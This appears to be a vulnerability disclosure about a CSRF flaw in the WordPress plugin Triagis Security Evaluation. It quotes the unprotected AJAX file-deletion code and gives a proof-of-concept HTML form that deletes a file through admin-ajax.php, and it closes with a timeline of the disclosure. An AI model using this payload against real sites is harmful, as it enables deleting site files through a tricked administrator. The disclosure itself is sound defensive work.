Far too often it is found that security plugins for WordPress introduce security vulnerabilities of their own, which if you know much about security isn’t too surprising considering that so many security companies don’t seem to know and or care much about security.
We recently ran across the security plugin Triagis® Security Evaluation, which is described as “a simple lite-weight plugin to analyze your current WordPress installation, server for security vulnerabilities”. While taking a look over the plugin we found that it made functions available through WordPress’ AJAX functionality that are restricted to Administrator level users, but lack protection against cross-site request forgery (CSRF). Through that an attacker could cause a logged in Administrator to change the WordPress content directory’s location, change the website’s file permissions, delete arbitrary files on a website, change a user’s username, change the database prefix, or move the WordPress configuration file. While CSRF vulnerabilities are not something likely to be targeted at this time, an attacker could cause some serious issues if they were successful in exploiting this.
As an example of the issues let’s take a look at the function w4sl_delete_file_ajax() (in the file /admin/page-security-informations.php), which handles deleting files.
The function checks if the user making the request is an Administrator:
if( !is_super_admin()) die( json_encode( array( 'error' => 'Unauthorized access !!' )));
Then it checks if the file being requested to exists and is readable:
578 579 580 581 582 583
$file = w4sl_sanitize_path( $_POST['file'] ); if( empty( $file ) || !file_exists( $file )) die( json_encode( array( 'error' => 'File not found !!' ))); if( !is_readable( $file )) die( json_encode( array( 'error' => 'File not readable !!' )));
After that it deletes the file:
@unlink( $file );
Nowhere in the function is there a check for valid nonce, which is used to prevent CSRF in WordPress.
Proof of Concept
The following proof of concept will delete a file named test.txt in the root directory of the WordPress install.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="w4sl_delete_file" /> <input type="hidden" name="file" value="../test.txt" /> <input type="submit" value="Submit" /> </form> </body> </html>
- April 10, 2017 – Developer notified.
- April 19, 2017 – WordPress.org Plugin Directory notified.
- April 19, 2017 – Removed from WordPress.org Plugin Directory.